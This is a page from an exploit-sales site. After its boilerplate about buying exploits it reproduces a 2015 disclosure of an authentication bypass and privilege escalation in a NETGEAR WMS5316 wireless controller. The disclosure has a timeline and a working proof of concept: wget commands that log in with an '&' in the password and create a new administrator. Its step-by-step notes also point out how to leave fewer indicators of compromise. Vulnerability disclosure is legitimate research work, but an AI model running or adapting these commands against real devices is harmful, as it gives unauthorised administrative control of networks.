0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
[NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation. WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15 (Build 1236). [-] Vulnerability Information: ============================== Title: NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation CVE: Not assigned Vendor: NETGEAR Product: WMS5316 ProSafe 16AP Wireless Management System Affected Version: Firmware 2.1.4.15 (Build 1236) Fixed Version: Not publicly available [-] Disclosure Timeline: ======================== 22/04/2015 Vulnerability identified by Reinforce Services 23/04/2015 Support case created with NETGEAR. 24/04/2015 Vendor requested further information. 27/04/2015 Issue escalated within NETGEAR. 30/04/2015 Issue confirmed by vendor. 18/05/2015 Vendor confirmed issue present in other controllers (details unknown) Beta update for WMS5316 expected first week of June. 06/25/2015 Vendor releases firmware version 2.1.5 that now contains a fix. http://downloadcenter.netgear.com/en/product/WMS5316# http://kb.netgear.com/app/answers/detail/a_id/29339 (Note: This has not been tested to confirm the issue is resolved) [-] Proof of Concept: ================= wget --keep-session-cookies --save-cookies=cookies.txt --post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D" http://192.168.1.2/login_handler.php && wget --load-cookies=cookies.txt --post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D" http://192.168.1.2/request_handler.php [-] Vulnerability Details: ========================== The process to bypass authentication and escalate privileges is as follows: One: Include the "&" symbol anywhere in the password value in the login request (as raw content - it must not be encoded). Two: After a moment, the system will accept those credentials and grant access to the GUI. The account appears somewhat restricted - but this is only client side. Three: Send a request to add a new administrative user. Four: The new admin account is then available for use as created above. Note: As an alternative, it is trivial to modify the Java code on it's way down to a browser to enable all of the admin functions rather than creating a new user. This worked as well - so it's not strictly necessary to create a new user; the bypass 'user' has full admin access if needed (leaving less indicators of compromise) # 0day.today [2024-07-02] #